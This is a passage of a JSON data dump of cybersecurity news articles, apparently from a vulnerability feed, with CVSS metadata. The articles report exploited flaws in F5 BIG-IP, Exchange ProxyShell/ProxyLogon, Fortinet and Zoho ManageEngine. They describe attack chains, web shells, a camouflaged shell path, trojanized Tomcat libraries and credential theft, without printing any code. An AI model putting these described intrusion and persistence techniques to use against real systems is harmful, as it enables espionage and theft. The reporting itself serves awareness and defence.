[CVE-2022-1388](<https://thehackernews.com/2022/05/cisa-urges-organizations-to-patch.html>) (CVSS score: 9.8), a recently disclosed remote code execution flaw affecting BIG-IP devices.\n\nCISA [said](<https://www.cisa.gov/uscert/ncas/alerts/aa22-138a>) it expects to \"see widespread exploitation of unpatched F5 BIG-IP devices (mostly with publicly exposed management ports or self IPs) in both government and private sector networks.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-19T05:48:00", "type": "thn", "title": "VMware Releases Patches for New Vulnerabilities Affecting Multiple Products", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388", "CVE-2022-22954", "CVE-2022-22960", "CVE-2022-22966", "CVE-2022-22972", "CVE-2022-22973"], "modified": "2022-05-19T05:48:33", "id": "THN:8E366D56AB2756B4DE53AEEA90675132", "href": "https://thehackernews.com/2022/05/vmware-releases-patches-for-new.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:05", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjiGzDP_Q8TgakrIFP6H8c0NlSHHH4ztdEtesv8G-AaS-LvfiauO6JgcrFpPKfplpRuqYssvepWzyhQaLMIPqPzyt00vE0kNEL3qEg1k1YRQpWZouKa_km8jD-kuKbNBXugV_MhYndYW41kM6o2z77T4oOGQlDGhGk-HA0tZfdol-RO_fCE6o7N54uW>)\n\nThreat actors are exploiting ProxyLogon and ProxyShell exploits in unpatched Microsoft Exchange Servers as part of an ongoing spam campaign that leverages stolen email chains to bypass security software and deploy malware on vulnerable systems.\n\nThe findings come from Trend Micro following an investigation into a number of intrusions in the Middle East that culminated in the distribution of a never-before-seen loader dubbed SQUIRRELWAFFLE. First publicly [documented](<https://thehackernews.com/2021/10/hackers-using-squirrelwaffle-loader-to.html>) by Cisco Talos, the attacks are believed to have commenced in mid-September 2021 via laced Microsoft Office documents.\n\n\"It is known for sending its malicious emails as replies to pre-existing email chains, a tactic that lowers a victim's guard against malicious activities,\" researchers Mohamed Fahmy, Sherif Magdy, Abdelrhman Sharshar [said](<https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html>) in a report published last week. \"To be able to pull this off, we believe it involved the use of a chain of both ProxyLogon and ProxyShell exploits.\"\n\n[ProxyLogon](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) and [ProxyShell](<https://thehackernews.com/2021/08/microsoft-exchange-under-attack-with.html>) refer to a collection of flaws in Microsoft Exchange Servers that could enable a threat actor to elevate privileges and remotely execute arbitrary code, effectively granting the ability to take control of the vulnerable machines. While the ProxyLogon flaws were addressed in March, the ProxyShell bugs were patched in a series of updates released in May and July.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEhYwBTFRq5MuslNIXJAtZNZ-q9Ik0Wyu_z6HVG8loZsBaeJR_tXRLvm18OZvIJYeeOyYp0DVHZdMg8sdqe9H3ePEot8dMGuNuC25YWuyp09kuYsm_qh2nU_3dlFK7X2kVXn-DYmtklqChAj_2BOpas4TFiWcbPR3PtoX5RKukcpGn0sd1S8Ubdqo1bu>) \n--- \nDLL infection flow \n \nTrend Micro said it observed the use of public exploits for CVE-2021-26855 (ProxyLogon), CVE-2021-34473, and CVE-2021-34523 (ProxyShell) on three of the Exchange servers that were compromised in different intrusions, using the access to hijack legitimate email threads and send malicious spam messages as replies, thereby increasing the likelihood that unsuspecting recipients will open the emails.\n\n\"Delivering the malicious spam using this technique to reach all the internal domain users will decrease the possibility of detecting or stopping the attack, as the mail getaways will not be able to filter or quarantine any of these internal emails,\" the researchers said, adding the attackers behind the operation did not carry out lateral movement or install additional malware so as to stay under the radar and avoid triggering any alerts.\n\nThe attack chain involves rogue email messages containing a link that, when clicked, drops a Microsoft Excel or Word file. Opening the document, in turn, prompts the recipient to enable macros, ultimately leading to the download and execution of the SQUIRRELWAFFLE malware loader, which acts as a medium to fetch final-stage payloads such as Cobalt Strike and Qbot.\n\nThe development marks a new escalation in phishing campaigns where a threat actor has breached corporate Microsoft Exchange email servers to gain unauthorized access to their internal mail systems and distribute malicious emails in an attempt to infect users with malware.\n\n\"SQUIRRELWAFFLE campaigns should make users wary of the different tactics used to mask malicious emails and files,\" the researchers concluded. \"Emails that come from trusted contacts may not be enough of an indicator that whatever link or file included in the email is safe.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-22T11:47:00", "type": "thn", "title": "Hackers Exploiting ProxyLogon and ProxyShell Flaws in Spam Campaigns", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-11-23T07:33:36", "id": "THN:0D80EEB03C07D557AA62E071C7A7C619", "href": "https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:05", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhKbdRreQ0Go0a6_nNV2mIHF-M4tF8ltZLh-zKh9XlGWei6N3zGQptPV2EVnu-c2aHwmgFtWbz4Xq0tDXGz3Z1dpDgiPu7RVWIwM8bhdGXus6httFDg3Syq5PSXHPDJiYhDv0KxH-eo9jncYNJb4pG6nA_987ryEtxPoAJr1RlSMcy7wdD0dNr3L2mW>)\n\nCybersecurity agencies from Australia, the U.K., and the U.S. on Wednesday [released](<https://us-cert.cisa.gov/ncas/current-activity/2021/11/17/iranian-government-sponsored-apt-cyber-actors-exploiting-microsoft>) a joint advisory warning of active exploitation of Fortinet and Microsoft Exchange ProxyShell vulnerabilities by Iranian state-sponsored actors to gain initial access to vulnerable systems for follow-on activities, including data exfiltration and ransomware.\n\nThe threat actor is believed to have leveraged multiple Fortinet FortiOS vulnerabilities dating back to March 2021 as well as a remote code execution flaw affecting Microsoft Exchange Servers since at least October 2021, according to the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the Australian Cyber Security Centre (ACSC), and the U.K.'s National Cyber Security Centre (NCSC).\n\nThe agencies did not attribute the activities to a specific advanced persistent threat (APT) actor. Targeted victims include Australian organizations and a wide range of entities across multiple U.S. critical infrastructure sectors, such as transportation and healthcare. The list of flaws being exploited are below \u2014\n\n * [**CVE-2021-34473**](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>) (CVSS score: 9.1) - Microsoft Exchange Server remote code execution vulnerability (aka \"[ProxyShell](<https://thehackernews.com/2021/08/microsoft-exchange-under-attack-with.html>)\")\n * [**CVE-2020-12812**](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>) (CVSS score: 9.8) - [FortiOS SSL VPN 2FA bypass](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>) by changing username case\n * [**CVE-2019-5591**](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>) (CVSS score: 6.5) - FortiGate [default configuration](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>) does not verify the LDAP server identity\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) - [FortiOS system file leak](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>) through SSL VPN via specially crafted HTTP resource requests\n\nBesides exploiting the ProxyShell flaw to gain access to vulnerable networks, CISA and FBI said they observed the adversary abusing a Fortigate appliance in May 2021 to gain a foothold to a web server hosting the domain for a U.S. municipal government. The next month, the APT actors \"exploited a Fortigate appliance to access environmental control networks associated with a U.S.-based hospital specializing in healthcare for children,\" the advisory said.\n\nThe development marks the second time the U.S. government has [alerted](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>) of advanced persistent threat groups targeting Fortinet FortiOS servers by leveraging CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591 to compromise systems belonging to government and commercial entities.\n\nAs mitigations, the agencies are recommending organizations to immediately patch software affected by the aforementioned vulnerabilities, enforce data backup and restoration procedures, implement network segmentation, secure accounts with multi-factor authentication, and patch operating systems, software, and firmware as and when updates are released.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-17T15:44:00", "type": "thn", "title": "U.S., U.K. and Australia Warn of Iranian Hackers Exploiting Microsoft, Fortinet Flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2021-34473"], "modified": "2021-11-22T07:14:13", "id": "THN:C3B82BB0558CF33CFDC326E596AF69C4", "href": "https://thehackernews.com/2021/11/us-uk-and-australia-warn-of-iranian.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:07", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEgGACK0sbY62-eZqfAxY507UACUU6L-2jv6DylVUuLJIlKvZ70mFTDCqexN_Ra9wCH0vczNR_SyX8JDu9w9hoQxe9JbFzT0l1V7Qa5nT7ZJu8hDShes_BHVy5lqMKr5lp4Z8Nnxrz-vXgqUp4O2XOrauZ5X_iVYbimAWmw_5f-dDDkeDGPvLqUzcWSH>)\n\nAt least nine entities across the technology, defense, healthcare, energy, and education industries were compromised by leveraging a [recently patched critical vulnerability](<https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html>) in Zoho's ManageEngine ADSelfService Plus self-service password management and single sign-on (SSO) solution.\n\nThe spying campaign, which was observed starting September 22, 2021, involved the threat actor taking advantage of the flaw to gain initial access to targeted organizations, before moving laterally through the network to carry out post-exploitation activities by deploying malicious tools designed to harvest credentials and exfiltrate sensitive information via a backdoor.\n\n\"The actor heavily relies on the Godzilla web shell, uploading several variations of the open-source web shell to the compromised server over the course of the operation,\" researchers from Palo Alto Networks' Unit 42 threat intelligence team [said](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>) in a report. \"Several other tools have novel characteristics or have not been publicly discussed as being used in previous attacks, specifically the NGLite backdoor and the KdcSponge stealer.\"\n\nTracked as [CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>), the vulnerability relates to an authentication bypass vulnerability affecting [REST API](<https://en.wikipedia.org/wiki/Representational_state_transfer>) URLs that could enable remote code execution, prompting the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to warn of active exploitation attempts in the wild. The security shortcoming has been rated 9.8 out of 10 in severity.\n\nReal-world attacks weaponizing the bug are said to have commenced as early as August 2021, according to CISA, the U.S. Federal Bureau of Investigation (FBI), and the Coast Guard Cyber Command (CGCYBER).\n\nUnit 42's investigation into the attack campaign found that successful initial exploitation activities were consistently followed by the installation of a Chinese-language JSP web shell named \"[Godzilla](<https://github.com/BeichenDream/Godzilla/>),\" with select victims also infected with a custom Golang-based open-source Trojan called \"[NGLite](<https://github.com/Maka8ka/NGLite>).\"\n\n\"NGLite is characterized by its author as an 'anonymous cross-platform remote control program based on blockchain technology,'\" researchers Robert Falcone, Jeff White, and Peter Renals explained. \"It leverages New Kind of Network ([NKN](<https://nkn.org/>)) infrastructure for its command and control (C2) communications, which theoretically results in anonymity for its users.\"\n\nIn subsequent steps, the toolset enabled the attacker to run commands and move laterally to other systems on the network, while simultaneously transmitting files of interest. Also deployed in the kill chain is a novel password-stealer dubbed \"KdcSponge\" orchestrated to steal credentials from domain controllers.\n\nUltimately, the adversary is believed to have targeted at least 370 Zoho ManageEngine servers in the U.S. alone beginning September 17. While the identity of the threat actor remains unclear, Unit 42 said it observed [correlations in tactics and tooling](<https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage>) between the attacker and that of [Emissary Panda](<https://thehackernews.com/2021/08/experts-believe-chinese-hackers-are.html>) (aka APT27, TG-3390, BRONZE UNION, Iron Tiger, or LuckyMouse).\n\nMicrosoft, which is also independently tracking the same campaign, tied it to an emerging threat cluster \"[DEV-0322](<https://thehackernews.com/2021/09/microsoft-says-chinese-hackers-were.html>)\" that's operating out of China and has been previously detected exploiting a zero-day flaw in SolarWinds Serv-U managed file transfer service in July 2021. The Redmond-based company also pointed out the deployment of an implant called \"[Zebracon](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>)\" that allows the malware to connect to compromised Zimbra email servers with the goal of retrieving additional instructions.\n\n\"Organizations that identify any activity related to ManageEngine ADSelfService Plus indicators of compromise within their networks should take action immediately,\" CISA [said](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>), in addition to recommending \"domain-wide password resets and double Kerberos Ticket Granting Ticket (TGT) password resets if any indication is found that the ['NTDS.dit](<https://attack.mitre.org/techniques/T1003/003/>)' file was compromised.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-08T14:39:00", "type": "thn", "title": "Experts Detail Malicious Code Dropped Using ManageEngine ADSelfService Exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-09T03:15:09", "id": "THN:D0F9B64B55AE6B07B3B0C0540189389E", "href": "https://thehackernews.com/2021/11/experts-detail-malicious-code-dropped.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-14T04:09:19", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjTxKfxj2a6lMbDbJaMo5tht_LOymmcrKcCWFtR24mQo74TUahCanF09uTukayi4zQWtyXbBN6gL1r8Q_F8hPVGvbFPUvpNfu0RMdh_in3x47i7NaY_2APPaDC8WmxtnyovksaoophnnKee-_hL8d3KTmywDQksxEixb5Qu7Hqf3_NL3lzttzW4eVJp/s728-e100/ms.jpg>)\n\nMicrosoft is warning of an uptick among nation-state and criminal actors increasingly leveraging publicly-disclosed zero-day vulnerabilities for breaching target environments.\n\nThe tech giant, in its 114-page [Digital Defense Report](<https://www.microsoft.com/en-us/security/business/microsoft-digital-defense-report-2022>), said it has \"observed a reduction in the time between the announcement of a vulnerability and the commoditization of that vulnerability,\" making it imperative that organizations patch such exploits in a timely manner.\n\nThis also corroborates with an April 2022 advisory from the U.S. Cybersecurity and Infrastructure Security Agency (CISA), which [found](<https://thehackernews.com/2022/04/us-cybersecurity-agency-lists-2021s-top.html>) that bad actors are \"aggressively\" targeting newly disclosed software bugs against broad targets globally.\n\nMicrosoft noted that it only takes 14 days on average for an exploit to be available in the wild after public disclosure of a flaw, stating that while zero-day attacks are initially limited in scope, they tend to be swiftly adopted by other threat actors, leading to indiscriminate probing events before the patches are installed.\n\nIt further accused Chinese state-sponsored groups of being \"particularly proficient\" at discovering and developing zero-day exploits.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj2Fv84B8E1NDduixEzAgNyU-RvvdpVt2eY23UON-dCns8KnaaAn-rqjv_Tihoscf0lzJzcswmhacAZgW8Jdh82sqVfWIDHVa5zBDWPlh_uT7dLVU8BmoLqbWxqL-deV3Ok2yZ8h76dqXIbZ3SIOJJND7p6ixLGZmV_q9RpnvhYkQ9ABNMKZOdjtetP/s728-e100/exploit.jpg>)\n\nThis has been compounded by the fact that the Cyberspace Administration of China (CAC) enacted a new [vulnerability reporting regulation](<https://thehackernews.com/2021/07/chinas-new-law-requires-researchers-to.html>) in September 2021 that requires security flaws to be reported to the government prior to them being shared with the product developers.\n\nRedmond further said the law could enable government-backed elements to stockpile and weaponize the reported bugs, resulting in the increased use of zero-days for espionage activities designed to advance China's economic and military interests.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjzThAws7Nwe2onkDTrV1eAUZuHoxUQmHQD89fb1AMyF95hzxM_bjDK2t9-CUBtPHmaWAaGh6oLRZRmlWELsneZ9fLS1yThyXWXTF3Vhb67iMNcw8AvGM2hLy535BKjYA6NJ8csrauUfJWp6VGl-g4LRpHIAsWQ1E7ev0MDFndlR4i_R0-xqgivOOTY/s728-e100/map.jpg>)\n\nSome of the vulnerabilities that were first exploited by Chinese actors before being picked up by other adversarial groups include -\n\n * [**CVE-2021-35211**](<https://thehackernews.com/2021/09/microsoft-says-chinese-hackers-were.html>) (CVSS score: 10.0) - A remote code execution flaw in SolarWinds Serv-U Managed File Transfer Server and Serv-U Secure FTP software that was exploited by DEV-0322.\n * [**CVE-2021-40539**](<https://thehackernews.com/2021/11/experts-detail-malicious-code-dropped.html>) (CVSS score: 9.8) - An authentication bypass flaw in Zoho ManageEngine ADSelfService Plus that was exploited by DEV-0322 (TiltedTemple).\n * [**CVE-2021-44077**](<https://thehackernews.com/2021/12/cisa-warns-of-actively-exploited.html>) (CVSS score: 9.8) - An unauthenticated remote code execution flaw in Zoho ManageEngine ServiceDesk Plus that was exploited by DEV-0322 (TiltedTemple).\n * [**CVE-2021-42321**](<https://thehackernews.com/2021/11/microsoft-issues-patches-for-actively.html>) (CVSS score: 8.8) - A remote code execution flaw in Microsoft Exchange Server that was exploited three days after it was revealed during the [Tianfu Cup](<https://thehackernews.com/2021/10/windows-10-linux-ios-chrome-and-many.html>) hacking contest on October 16-17, 2021.\n * [**CVE-2022-26134**](<https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html>) (CVSS score: 9.8) - An Object-Graph Navigation Language (OGNL) injection flaw in Atlassian Confluence that's likely to have been leveraged by a China-affiliated actor against an unnamed U.S. entity days before the flaw's disclosure on June 2.\n\nThe findings also come almost a month after CISA released a list of [top vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa22-279a>) weaponized by China-based actors since 2020 to steal intellectual property and develop access into sensitive networks.\n\n\"Zero-day vulnerabilities are a particularly effective means for initial exploitation and, once publicly exposed, vulnerabilities can be rapidly reused by other nation-state and criminal actors,\" the company said.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-11-05T06:00:00", "type": "thn", "title": "Microsoft Warns of Uptick in Hackers Leveraging Publicly-Disclosed 0-Day Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211", "CVE-2021-40539", "CVE-2021-42321", "CVE-2021-44077", "CVE-2022-26134"], "modified": "2022-12-14T04:04:34", "id": "THN:FD9FEFEA9EB66115FF4BAECDD8C520CB", "href": "https://thehackernews.com/2022/11/microsoft-warns-of-uptick-in-hackers.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-27T06:23:39", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEir9ashBlzYstB30JiY9ntCyqdFv7TBDTd3XRfvOMDk4Ka9ZdNjxIlb3oB0SGPEMienyxJnqNpL3EPyRzXieCYFB7ddRtbPPf6cJmSeMT_28A0M1BjoKpYeBtndAgeQB5vda6U3TZMGJ6d3AI2WouX5SCSc5oBPy4Djyg6XFA3d3kIm71WPd5-HpQDE8qM/s728-e365/critical.jpg>)\n\nThe newly discovered Chinese nation-state actor known as Volt Typhoon has been observed to be active in the wild since at least mid-2020, with the hacking crew linked to never-before-seen tradecraft to retain remote access to targets of interest.\n\nThe findings come from CrowdStrike, which is tracking the adversary under the name **Vanguard Panda**.\n\n\"The adversary consistently employed ManageEngine Self-service Plus exploits to gain initial access, followed by custom web shells for persistent access, and living-off-the-land (LotL) techniques for lateral movement,\" the cybersecurity company [said](<https://www.crowdstrike.com/blog/falcon-complete-thwarts-vanguard-panda-tradecraft/>).\n\nVolt Typhoon, as known as Bronze Silhouette, is a [cyber espionage group](<https://thehackernews.com/2023/05/chinas-stealthy-hackers-infiltrate-us.html>) from China that's been linked to network intrusion operations against the U.S government, defense, and other critical infrastructure organizations.\n\n\"This adversary has been known to leverage credentials and living-off-the-land techniques to remain hidden and move quickly through targeted environments,\" Tom Etheridge, chief global professional services officer at CrowdStrike, told The Hacker News.\n\nAn analysis of the group's modus operandi has revealed its emphasis on operational security, carefully using an extensive set of open-source tools against a limited number of victims to carry out long-term malicious acts.\n\nIt has been further described as a threat group that \"favors web shells for persistence and relies on short bursts of activity primarily involving living-off-the-land binaries to achieve its objectives.\"\n\nIn one unsuccessful incident targeting an unspecified customer, the actor targeted the Zoho ManageEngine ADSelfService Plus service running on an Apache Tomcat server to trigger the execution of suspicious commands pertaining to process enumeration and network connectivity, among others. \n\n\"Vanguard Panda's actions indicated a familiarity with the target environment, due to the rapid succession of their commands, as well as having specific internal hostnames and IPs to ping, remote shares to mount, and plaintext credentials to use for [WMI](<https://learn.microsoft.com/en-us/windows/win32/wmisdk/wmi-start-page>),\" CrowdStrike said.\n\nA closer examination of the Tomcat access logs unearthed several HTTP POST requests to /html/promotion/selfsdp.jspx, a web shell that's camouflaged as the legitimate identity security solution to sidestep detection.\n\nThe web shell is believed to have been deployed nearly six months before the aforementioned hands-on-keyboard activity, indicative of extensive prior recon of the target network.\n\nWhile it's not immediately clear how Vanguard Panda managed to breach the ManageEngine environment, all signs point to the exploitation of [CVE-2021-40539](<https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html>), a critical authentication bypass flaw with resultant remote code execution.\n\n[](<https://www.memcyco.com/home/library/the-untold-cost-of-brand-impersonation-ebook/?utm_source=thn&utm_medium=referral&utm_campaign=ebook-campaign> \"Cybersecurity\" )\n\nIt's suspected that the threat actor deleted artifacts and tampered with the access logs to [obscure the forensic trail](<https://attack.mitre.org/techniques/T1070/>). However, in a glaring misstep, the process failed to account for Java source and [compiled class files](<https://en.wikipedia.org/wiki/Java_class_file>) that were generated during the course of the attack, leading to the discovery of more web shells and backdoors.\n\nThis includes a JSP file that's likely retrieved from an external server and which is designed to backdoor \"tomcat-websocket.jar\" by making use of an ancillary JAR file called \"tomcat-ant.jar\" that's also fetched remotely by means of a web shell, after which cleanup actions are performed to cover up the tracks.\n\nThe trojanized version of tomcat-websocket.jar is fitted with three new Java classes \u2013 named A, B, and C \u2013 with A.class functioning as another web shell capable of receiving and executing Base64-encoded and AES-encrypted commands.\n\n\"The use of a backdoored Apache Tomcat library is a previously undisclosed persistence TTP in use by Vanguard Panda,\" CrowdStrike said, noting with moderated confidence that the implant is used to \"enable persistent access to high-value targets downselected after the initial access phase of operations using then zero-day vulnerabilities.\"\n\n\"In this case, [...] Vanguard Panda had an advanced understanding of the victim's environment indicating that they were persistent and went undetected prior to our technology being deployed while they carried out their reconnaissance efforts,\" Etheridge explained. \"Additionally it moved evidence, covering their tracks as they moved deeper into the victim's infrastructure.\"\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-06-26T05:51:00", "type": "thn", "title": "Chinese Hackers Using Never-Before-Seen Tactics for Critical Infrastructure Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2023-06-27T05:21:18", "id": 